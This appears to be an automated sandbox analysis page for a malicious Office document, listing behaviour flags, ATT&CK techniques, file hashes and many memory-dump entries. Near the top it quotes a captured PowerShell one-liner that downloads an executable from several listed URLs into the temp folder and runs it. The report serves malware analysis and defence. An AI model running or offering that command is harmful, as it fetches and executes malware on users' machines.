- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dif=new-object Net.WebClient;$zrh='http://coopspage.com/fLCt@http://butterbean.se/KKHaZ8Oh@http://boutique-amour.jp/958Jf@http://bike-nomad.com/wp-content/jBN92RTl@http://websitedesigngarden.com/fmkE'.Split('@');$dbY = '109';$SZj=$env:temp+'\'+$dbY+'.exe';foreach($Wcz in $zrh){try{$dif.DownloadFile($Wcz, $SZj);Start-Process $SZj;break;}catch{}}
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
Filesize
20KB

MD5
1271433121a02d97f617760027eac1c5

SHA1
7d5b40f35451cc0a31386fcf3e4d537411d16a7e

SHA256
d29203a5efb5c447a97fad7b2b91a393ab7afdb86cd0cd41f83e7f86a3bba737

SHA512
ab1d2177bee0850d30c5408f7761be989ef899037f8bfc7534c33e792eaa9e44500a3e003c9cb2a4e77671bf53d4e31647b114a6b85a45c43332cf41a91fdcc8

Download Submit
memory/2492-18-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2492-15-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-14-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-66-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-80-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-79-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-51-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-50-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-36-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-35-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-33-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-31-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-30-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-28-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-26-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-13-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-24-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-22-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-21-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-20-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-0-0x000000002F3D1000-0x000000002F3D2000-memory.dmp

Filesize
4KB

Download
memory/2492-9-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-2-0x000000007141D000-0x0000000071428000-memory.dmp

Filesize
44KB

Download
memory/2492-25-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-10-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-56-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-46-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-34-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-32-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-29-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-27-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-23-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-77-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-76-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-19-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-17-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-16-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-8-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-7-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-11-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-6-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-90-0x000000007141D000-0x0000000071428000-memory.dmp

Filesize
44KB

Download
memory/2492-91-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-12-0x0000000000500000-0x0000000000600000-memory.dmp

Filesize
1024KB

Download
memory/2492-107-0x000000007141D000-0x0000000071428000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads